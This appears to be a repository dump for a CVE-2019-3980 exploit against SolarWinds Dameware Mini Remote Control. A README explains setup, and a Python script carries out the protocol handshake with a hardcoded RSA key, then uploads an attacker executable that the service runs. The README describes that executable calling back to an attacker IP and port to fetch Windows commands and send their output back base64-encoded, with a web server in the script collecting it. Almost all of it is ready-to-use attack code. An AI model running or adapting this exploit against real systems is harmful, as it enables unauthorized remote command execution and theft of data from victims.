├── Exec.zip
├── README.md
├── dameware-poc.py
├── dameware-poc1.png
└── dameware-poc2.png


/Exec.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/warferik/CVE-2019-3980/3f543df4c4ac4c5bae4f22a938d5f28b3d138047/Exec.zip


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2019-3980
 2 | 
 3 | This repo was created to utilize the Nessus POC with a custom C# executable to run commands on a remote host and get the output of the command.
 4 | <br />
 5 | <br />
 6 | The python file is used to start a web server, execute the exploit, and then get the results over the web server.<br />
 7 | The C# exe is uploaded through the exploit to the target. 
 8 | When executed on thte target, the exe calls back to the IP/Port specified to get the command to run (path is /cmd).<br />
 9 | Once the command finishes, the exe sends the output to the same webserver.
10 | Sending the output is done through a GET request that will generate a 404, but thats fine we just want the base64 data.
11 | <br />
12 | <br />
13 | C# exe has two variables that need to be updated<br />
14 | These variables reference the attacking systems IP and Port<br />
15 | string ip = "10.8.0.3"; <br />
16 | string port = "8000";
17 | 
18 | <br />
19 | --if port is updated, python script needs to be updated as well, variable to server the HTTP server is below in python script
20 | PORT = 8000 
21 | <br />
22 | Wherever script is launched from needs to contain the file uploaded and well as file called "cmd" which contains the windows commands you want to run.
23 | <br />
24 | <br />
25 | To use this script:<br />
26 | Update variables<br />
27 | create cmd file with commands to run on vulnerable host<br />
28 | compile c# solution contained in zip file <br />
29 | run python script:
30 | 
31 | python dameware-poc.py -t target_ip -e executable_to_upload
32 | <br />
33 | 
34 | Example below runs the net users command on the remote host
35 | <br />
36 | ![Alt text](/dameware-poc1.png?raw=true&sanitize=true)
37 | <br />
38 | ![Alt text](/dameware-poc2.png?raw=true&sanitize=true)
39 | 


--------------------------------------------------------------------------------
/dameware-poc.py:
--------------------------------------------------------------------------------
  1 | import sys, socket, os,string, binascii, argparse
  2 | from struct import *
  3 | from Crypto.Cipher import AES
  4 | from Crypto.Hash import HMAC,SHA512
  5 | from Crypto.Protocol import KDF 
  6 | from Crypto.Signature import PKCS1_v1_5
  7 | from Crypto.PublicKey import RSA
  8 | import SimpleHTTPServer 
  9 | import SocketServer
 10 | import os
 11 | import threading
 12 | import time
 13 | import logging
 14 | import urlparse
 15 | import base64
 16 | try: 
 17 |         from http.server import HTTPServer, SimpleHTTPRequestHandler # Python 3
 18 | except ImportError: 
 19 |         from SimpleHTTPServer import BaseHTTPServer
 20 |         HTTPServer = BaseHTTPServer.HTTPServer
 21 |         from SimpleHTTPServer import SimpleHTTPRequestHandler
 22 | 
 23 | 
 24 | PORT = 8000 
 25 | 
 26 | #Handler = SimpleHTTPServer.SimpleHTTPRequestHandler 
 27 | 
 28 | class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
 29 | 
 30 |   def do_GET(self):
 31 |     #logging.error(self.headers)
 32 |     parsedParams = urlparse.urlparse(self.path)
 33 |     if os.access('.' + os.sep + parsedParams.path, os.R_OK):
 34 |       # File exists, serve it up
 35 |       SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self);
 36 |     else:
 37 |       try:
 38 |           
 39 |           newstr = self.path
 40 |           newstr1 = newstr.strip("/")
 41 |           print newstr1
 42 |           newstr2 = base64.b64decode(newstr1)
 43 |           print newstr2
 44 |       except:
 45 |           print "Not base64"
 46 |     #SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
 47 | 
 48 | Handler = GetHandler
 49 | 
 50 | httpd = SocketServer.TCPServer(("", PORT), Handler) 
 51 | thread = threading.Thread(target = httpd.serve_forever)
 52 | thread.daemon = True
 53 | thread.start()
 54 | 
 55 | time.sleep(10)
 56 | 
 57 | def fin():
 58 |   s.shutdown(socket.SHUT_RDWR)
 59 | 
 60 | 
 61 | #source https://raw.githubusercontent.com/tenable/poc/master/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py
 62 | # Got it from the Internet 
 63 | def hexdump(src, length=16):
 64 |   DISPLAY = string.digits + string.letters + string.punctuation
 65 |   FILTER = ''.join(((x if x in DISPLAY else '.') for x in map(chr, range(256))))
 66 |   lines = []
 67 |   for c in xrange(0, len(src), length):
 68 |     chars = src[c:c+length]
 69 |     hex = ' '.join(["%02x" % ord(x) for x in chars])
 70 |     if len(hex) > 24:
 71 |       hex = "%s %s" % (hex[:24], hex[24:])
 72 |     printable = ''.join(["%s" % FILTER[ord(x)] for x in chars])
 73 |     lines.append("%08x:  %-*s  %s\n" % (c, length*3, hex, printable))
 74 |   return ''.join(lines)
 75 | 
 76 | def dump(title, data):
 77 |   print '--- [ %s ] --- ' % (title)
 78 |   print hexdump(data) 
 79 | 
 80 | def recvall(sock, n):
 81 |   data = ''
 82 |   while len(data) < n:
 83 |       packet = sock.recv(n - len(data))
 84 |       if not packet:
 85 |           return None
 86 |       data += packet
 87 |   return data
 88 | 
 89 | def xrecv(sock):
 90 |   data = ''
 91 |   # Read 0xc-byte header
 92 |   data = recvall(sock, 0xc)
 93 |   
 94 |   # Parse header 
 95 |   (type, unk, size) = unpack('<III', data)
 96 |  
 97 |   # Get data if any 
 98 |   if size:
 99 |     data += recvall(sock, size)
100 | 
101 |   return data
102 | 
103 | 
104 | def aes_cbc_encrypt(data,key,iv):
105 |   cipher = AES.new(key, AES.MODE_CBC, iv)
106 |   return cipher.encrypt(data)
107 | 
108 | def aes_cbc_decrypt(data,key,iv):
109 |   cipher = AES.new(key, AES.MODE_CBC, iv)
110 |   return cipher.decrypt(data)
111 | 
112 | 
113 | def int2bin(i):
114 |   hs = format(i, 'x')
115 |   if (len(hs) % 2):
116 |     hs = '0' + hs
117 |   return binascii.unhexlify(hs)
118 | 
119 | 
120 | 
121 | #
122 | # MAIN
123 | #
124 | desc = 'This PoC attempts to upload and run a malicious dwDrvInst.exe.'
125 | 
126 | arg_parser = argparse.ArgumentParser(desc)
127 | arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
128 | arg_parser.add_argument('-e', required=True, help='exe to send as dwDrvInst.exe (Required)')
129 | arg_parser.add_argument('-p', type=int, default=6129, help='DWRCS.exe port, default: 6129')
130 | 
131 | args = arg_parser.parse_args()
132 | host = args.t
133 | port = args.p
134 | exe  = args.e
135 | 
136 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
137 | s.settimeout(10)
138 | s.connect((host, port))
139 | 
140 | # Read MSG_TYPE_VERSION
141 | res = s.recv(0x28)
142 | 
143 | (type,) = unpack_from('<I', res)
144 | if type != 0x00001130:
145 |   print 'Received message not MSG_TYPE_VERSION'
146 |   s.clos()
147 |   sys.exit(1)
148 | 
149 | # Send MSG_TYPE_VERSION, requesting smart card auth
150 | req = pack('<I4sddIIII', 0x1130,'\x00',12.0,0.0,4,0,0,3)
151 | s.sendall(req)
152 | 
153 | # Read MSG_CLIENT_INFORMATION_V7
154 | res = recvall(s,0x3af8)
155 | (type,) = unpack_from('<I', res)
156 | if type != 0x00011171:
157 |   print 'Received message not MSG_CLIENT_INFORMATION_V7'
158 |   s.close()
159 |   sys.exit(1)
160 | 
161 | #dump('server MSG_CLIENT_INFORMATION_V7', res)
162 | 
163 | # Pick out the datetime string
164 | datetime = '' 
165 | i = 8
166 | b = res[i]
167 | while(b != '\x00'):
168 |   datetime += b 
169 |   i = i + 2 
170 |   b = res[i]
171 | 
172 | salt ='\x54\x40\xf4\x91\xa6\x06\x25\xbc' 
173 | prf = lambda p,s: HMAC.new(p,s,SHA512).digest()
174 | key = KDF.PBKDF2(datetime, salt, 16, 1000, prf) 
175 | dump('Derived key from passwd ' + datetime, key)
176 | 
177 | #
178 | # Send MSG_CLIENT_INFORMATION_V7
179 | #
180 | # Should be able to use the one sent by the server
181 | req = res
182 | s.sendall(req)
183 | 
184 | # Read MSG_TYPE_RSA_CRYPTO_C_INIT
185 | res = recvall(s,0x1220)
186 | (type,enc_len,) = unpack_from('<II', res)
187 | if type != 0x000105b8:
188 |   print 'Received message not MSG_TYPE_RSA_CRYPTO_C_INIT'
189 |   s.close()
190 |   sys.exit(1)
191 | 
192 | #dump('server MSG_TYPE_RSA_CRYPTO_C_INIT', res)
193 | 
194 | # Encrypted params at offset 0x100c
195 | crypt = res[0x100c:0x100c+enc_len]
196 | iv ='\x54\x40\xF4\x91\xA6\x06\x25\xBC\x8E\x84\x56\xD6\xCB\xB7\x40\x59'
197 | params = aes_cbc_decrypt(crypt,key,iv)
198 | dump('Encrypted server MSG_TYPE_RSA_CRYPTO_C_INIT params', crypt)
199 | dump('Decrypted server MSG_TYPE_RSA_CRYPTO_C_INIT params', params)
200 | 
201 | # Send  MSG_TYPE_RSA_CRYPTO_C_INIT
202 | # Should be able to use the one sent by the server
203 | req = res
204 | s.sendall(req)
205 | 
206 | 
207 | # Read MSG_000105b9 (1)
208 | res = recvall(s,0x2c2c)
209 | (type,) = unpack_from('<I', res)
210 | if type != 0x000105b9:
211 |   print 'Received message not MSG_000105b9'
212 |   s.close()
213 |   sys.exit(1)
214 | 
215 | #dump('server MSG_000105b9 (1)', res)
216 | 
217 | # Get server DH public key
218 | (pubkey_len,) = unpack_from('<I', res, 0x140c)
219 | srv_pubkey = res[0x100c:0x100c+pubkey_len]
220 | dump('server DH public key', srv_pubkey)
221 | srv_pubkey = int(binascii.hexlify(srv_pubkey), base=16)
222 | 
223 | dh_prime = 0xF51FFB3C6291865ECDA49C30712DB07B
224 | dh_gen = 3
225 | 
226 | clt_privkey = int(binascii.hexlify(os.urandom(16)), base=16) 
227 | 
228 | clt_pubkey  = int2bin(pow(dh_gen, clt_privkey, dh_prime))
229 | dump('client DH public key', clt_pubkey)
230 | 
231 | shared_secret = int2bin(pow(srv_pubkey, clt_privkey, dh_prime))
232 | dump('DH shared secret', shared_secret)
233 | 
234 | # Compute the sum of the bytes in the shared secret
235 | clt_sum = 0
236 | for b in shared_secret: clt_sum = clt_sum + ord(b)
237 | 
238 | buf = list(res);
239 | 
240 | # Send MSG_000105b9 (1)
241 | # Fill in client DH public key and length 
242 | buf[0x1418:0x1418+len(clt_pubkey)] = clt_pubkey
243 | buf[0x1818:0x1818 + 4] = pack('<I',len(clt_pubkey))
244 | req = ''.join(buf)
245 | #dump('client MSG_000105b9 (1)', req)
246 | s.sendall(req)
247 | 
248 | #
249 | # Server send back the length and addsum of the shared secret
250 | #
251 | res = recvall(s,0x2c2c)
252 | (type,) = unpack_from('<I', res)
253 | if type != 0x000105b9:
254 |   print 'Received message not MSG_000105b9'
255 |   s.close()
256 |   sys.exit(1)
257 | 
258 | #dump('server MSG_000105b9 (2)', res)
259 | 
260 | (srv_sum,) = unpack_from('<I', res, 0x1820)
261 | 
262 | # Byte sum of the shared secret should match on the client and server
263 | print 'client-computed sum of the DH shared secret: 0x%x' % (clt_sum)
264 | print 'server-computed sum of the DH shared secret: 0x%x' % (srv_sum)
265 | 
266 | #
267 | #  1024-byte RSA key
268 | # 
269 | rsa_key  = "\x30\x82\x02\x5D\x02\x01\x00\x02\x81\x81\x00\xAD\x8C\x81\x7B\xC7"
270 | rsa_key += "\x0B\xCA\xF7\x50\xBB\xD3\xA0\x7D\xC0\xA4\x31\xE3\xDD\x28\xCE\x99"
271 | rsa_key += "\x78\x05\x92\x94\x41\x03\x85\xF5\xF0\x24\x77\x9B\xB1\xA6\x1B\xC7"
272 | rsa_key += "\x9A\x79\x4D\x69\xAE\xCB\xC1\x5A\x88\xB6\x62\x9F\x93\xF5\x4B\xCA"
273 | rsa_key += "\x86\x6C\x23\xAE\x4F\x43\xAC\x81\x7C\xD9\x81\x7E\x30\xB4\xCC\x78"
274 | rsa_key += "\x6B\x77\xD0\xBB\x20\x1C\x35\xBE\x4D\x12\x44\x4A\x63\x14\xEC\xFC"
275 | rsa_key += "\x9A\x86\xA2\x4F\x98\xB9\xB5\x49\x5F\x6C\x37\x08\xC0\x1D\xD6\x33"
276 | rsa_key += "\x67\x97\x7C\x0D\x36\x62\x70\x25\xD8\xD4\xE8\x44\x61\x59\xE3\x61"
277 | rsa_key += "\xCA\xB8\x9E\x14\x14\xAA\x2F\xCB\x89\x10\x1B\x02\x03\x01\x00\x01"
278 | rsa_key += "\x02\x81\x81\x00\xA1\x60\xCF\x22\xD7\x33\x3B\x18\x00\x85\xB7\xC3"
279 | rsa_key += "\x3C\x4C\x3F\x22\x79\x3D\xB4\xED\x70\x3D\xF0\x08\x9E\x3D\x5A\x56"
280 | rsa_key += "\x5E\x1C\x60\xFC\xAB\xD5\x64\x9D\xDE\x5C\xE1\x41\x3F\xED\x9F\x60"
281 | rsa_key += "\x7B\x9C\x36\xE4\xBC\x78\xEC\x16\xFF\x0B\x42\x51\x67\x8C\x23\x64"
282 | rsa_key += "\xAC\xBF\xF8\xCB\xED\xE8\x46\x66\x40\x8F\x70\x46\x10\x9C\x63\x07"
283 | rsa_key += "\x74\x33\x64\x26\x25\xA6\x34\x43\x8F\x95\xA9\x70\xD1\x40\x69\x0B"
284 | rsa_key += "\xF8\xC8\x62\x5F\x8D\xE8\x8F\xC4\x46\xBF\x09\xAB\x83\x68\xFE\x5F"
285 | rsa_key += "\x2D\x2D\x3B\xD9\xF5\xD5\x32\x34\xBC\x37\x17\xCB\x13\x50\x96\x6E"
286 | rsa_key += "\x26\x82\xC2\x39\x02\x41\x00\xD9\x5D\x24\x6C\x3B\xA7\x85\x7F\xD9"
287 | rsa_key += "\x6A\x7E\xDC\x4E\xDC\x67\x10\x1D\x6E\xAC\x19\xA9\xA3\xF7\xC0\x27"
288 | rsa_key += "\x0A\xC3\x03\x94\xB5\x16\x54\xFC\x27\x3B\x41\xBC\x52\x80\x6B\x14"
289 | rsa_key += "\x01\x1D\xAC\x9F\xC0\x04\xB9\x26\x01\x96\x68\xD8\xB9\x9A\xAD\xD8"
290 | rsa_key += "\xA1\x96\x84\x93\xA2\xD8\xAF\x02\x41\x00\xCC\x65\x9E\xA8\x08\x7B"
291 | rsa_key += "\xD7\x3D\x61\xD2\xB3\xCF\xC6\x4F\x0C\x65\x25\x1E\x68\xC6\xAC\x04"
292 | rsa_key += "\xD0\xC4\x3A\xA7\x9E\xEB\xDE\xD9\x20\x9A\xCE\x92\x77\xB7\x84\xC0"
293 | rsa_key += "\x1B\x42\xB4\xCA\xBE\xFC\x20\x88\x68\x2D\x0F\xC4\x6D\x44\x28\xA0"
294 | rsa_key += "\x40\x0F\x88\x25\x08\x12\x51\x86\x42\x55\x02\x41\x00\xA4\x52\x0D"
295 | rsa_key += "\x9E\xE4\xDA\x17\xCA\x37\x0A\x93\x2C\xE9\x51\x25\x78\xC1\x47\x51"
296 | rsa_key += "\x43\x75\x43\x47\xA0\x33\xE3\xA6\xD9\xA6\x29\xDF\xE0\x0F\x5F\x79"
297 | rsa_key += "\x24\x90\xC1\xAD\xE3\x45\x14\x32\xE2\xB5\x41\xEC\x50\x2B\xB3\x37"
298 | rsa_key += "\x89\xBB\x8D\x54\xA9\xE8\x03\x00\x4E\xE9\x6D\x4A\x71\x02\x40\x4E"
299 | rsa_key += "\x23\x73\x19\xCD\xD4\x7A\x1E\x6F\x2D\x3B\xAC\x6C\xA5\x7F\x99\x93"
300 | rsa_key += "\x2D\x22\xE5\x00\x91\xFE\xB5\x65\xAE\xFA\xE4\x35\x17\x50\x8D\x9D"
301 | rsa_key += "\xF7\x04\x69\x56\x08\x92\xE3\x57\x76\x42\xB8\xE4\x3F\x01\x84\x68"
302 | rsa_key += "\x88\xB1\x34\xE3\x4B\x0F\xF2\x60\x1B\xB8\x10\x38\xB6\x58\xD9\x02"
303 | rsa_key += "\x40\x65\xB1\xDE\x13\xAB\xAA\x01\x0D\x54\x53\x86\x85\x08\x5B\xC8"
304 | rsa_key += "\xC0\x06\x7B\xBA\x51\xC6\x80\x0E\xA4\xD2\xF5\x63\x5B\x3C\x3F\xD1"
305 | rsa_key += "\x30\x66\xA4\x2B\x60\x87\x9D\x04\x5F\x16\xEC\x51\x02\x9F\x53\xAA"
306 | rsa_key += "\x22\xDF\xB4\x92\x01\x0E\x9B\xA6\x6C\x5E\x9D\x2F\xD8\x6B\x60\xD7"
307 | rsa_key += "\x47"
308 | 
309 | #
310 | # Public part of the RSA key
311 | # 
312 | rsa_pubkey  = "\x30\x81\x89\x02\x81\x81\x00\xAD\x8C\x81\x7B\xC7\x0B\xCA\xF7\x50"
313 | rsa_pubkey += "\xBB\xD3\xA0\x7D\xC0\xA4\x31\xE3\xDD\x28\xCE\x99\x78\x05\x92\x94"
314 | rsa_pubkey += "\x41\x03\x85\xF5\xF0\x24\x77\x9B\xB1\xA6\x1B\xC7\x9A\x79\x4D\x69"
315 | rsa_pubkey += "\xAE\xCB\xC1\x5A\x88\xB6\x62\x9F\x93\xF5\x4B\xCA\x86\x6C\x23\xAE"
316 | rsa_pubkey += "\x4F\x43\xAC\x81\x7C\xD9\x81\x7E\x30\xB4\xCC\x78\x6B\x77\xD0\xBB"
317 | rsa_pubkey += "\x20\x1C\x35\xBE\x4D\x12\x44\x4A\x63\x14\xEC\xFC\x9A\x86\xA2\x4F"
318 | rsa_pubkey += "\x98\xB9\xB5\x49\x5F\x6C\x37\x08\xC0\x1D\xD6\x33\x67\x97\x7C\x0D"
319 | rsa_pubkey += "\x36\x62\x70\x25\xD8\xD4\xE8\x44\x61\x59\xE3\x61\xCA\xB8\x9E\x14"
320 | rsa_pubkey += "\x14\xAA\x2F\xCB\x89\x10\x1B\x02\x03\x01\x00\x01"
321 | 
322 | rsa_privkey = RSA.importKey(rsa_key)
323 | hash = SHA512.new(shared_secret)
324 | signer = PKCS1_v1_5.new(rsa_privkey)
325 | rsa_sig = signer.sign(hash)
326 | dump('RSA signature of the DH shared secret', rsa_sig)
327 | 
328 | buf = list(res)
329 | # Fill in the length and sum of the client-computed DH shared secret
330 | buf[0x1410: 0x1410 + 4] = pack('<I',len(shared_secret))
331 | buf[0x1414: 0x1414 + 4] = pack('<I',clt_sum) 
332 | 
333 | # Fill in the RSA signature of the DH shared secret 
334 | buf[0x1824: 0x1824 + len(rsa_sig)] = rsa_sig
335 | buf[0x2024: 0x2024 + 4] = pack('<I', len(rsa_sig))
336 | 
337 | # Fill in the RSA public key
338 | buf[0x2028: 0x2028 + len(rsa_pubkey)] = rsa_pubkey
339 | buf[0x2828: 0x2828 + 4] =  pack('<I', len(rsa_pubkey))
340 | 
341 | req = ''.join(buf)
342 | #dump('client MSG_000105b9 (2)', req)
343 | s.sendall(req)
344 | 
345 | # Server should send MSG_REGISTRATION_INFORMATION
346 | res = recvall(s,0xc50)
347 | (type,) = unpack_from('<I', res)
348 | if type != 0x0000b004:
349 |   print 'Received message not MSG_REGISTRATION_INFORMATION'
350 |   s.close()
351 |   sys.exit(1)
352 | 
353 | #dump('server MSG_REGISTRATION_INFORMATION', res)
354 | 
355 | # Send our MSG_REGISTRATION_INFORMATION
356 | # Should be able to use the one sent by the server
357 | req = res
358 | s.sendall(req)
359 | 
360 | # Server should send MSG_SOCKET_ADD 
361 | res = recvall(s,0x224)
362 | (type,) = unpack_from('<I', res)
363 | if type != 0x00010626:
364 |   print 'Received message not MSG_SOCKET_ADD'
365 |   s.close()
366 |   sys.exit(1)
367 | 
368 | #dump('server MSG_SOCKET_ADD', res)
369 | 
370 | # Server should MSG_D6E2
371 | res = recvall(s,0x1438)
372 | (type,) = unpack_from('<I', res)
373 | if type != 0x0000D6E2:
374 |   print 'Received message not MSG_10626'
375 |   s.close()
376 |   sys.exit(1)
377 | 
378 | #dump('server MSG_D6E2', res)
379 | 
380 | # Send our MSG_D6E2
381 | req = res
382 | s.sendall(req)
383 | 
384 | # Server should send a MSG_SMARTCARD_COMMAND with no data part
385 | res = xrecv(s)
386 | (type,) = unpack_from('<I', res)
387 | if type != 0x0000D6F6:
388 |   print 'Received message not MSG_SMARTCARD_COMMAND'
389 |   s.close()
390 |   sys.exit(1)
391 | 
392 | #dump('server MSG_SMARTCARD_COMMAND', res)
393 | 
394 | # Server should send another MSG_SMARTCARD_COMMAND with no data part
395 | res = xrecv(s)
396 | (type,) = unpack_from('<I', res)
397 | if type != 0x0000D6F6:
398 |   print 'Received message not MSG_SMARTCARD_COMMAND'
399 |   s.close()
400 |   sys.exit(1)
401 | 
402 | #dump('server MSG_SMARTCARD_COMMAND', res)
403 | 
404 | # Send our dwDrvInst.exe with a MSG_SMARTCARD_COMMAND
405 | print 'Sending malicious dwDrvInst.exe ...'
406 | with open(exe,'rb') as f: data = f.read()
407 | req = pack('<III', 0xD6F6,2, len(data))
408 | req += data;
409 | s.sendall(req)
410 | print 'Please check if dwDrvInst.exe is launched on %s.\n' % (host)
411 | 
412 | # Any response?
413 | print 'Checking any response from the server...'
414 | res = s.recv(0x4000)
415 | dump('Response after sending malicious dwDrvInst.exe', res)
416 | 
417 | time.sleep(2)
418 | fin()
419 | 


--------------------------------------------------------------------------------
/dameware-poc1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/warferik/CVE-2019-3980/3f543df4c4ac4c5bae4f22a938d5f28b3d138047/dameware-poc1.png


--------------------------------------------------------------------------------
/dameware-poc2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/warferik/CVE-2019-3980/3f543df4c4ac4c5bae4f22a938d5f28b3d138047/dameware-poc2.png


--------------------------------------------------------------------------------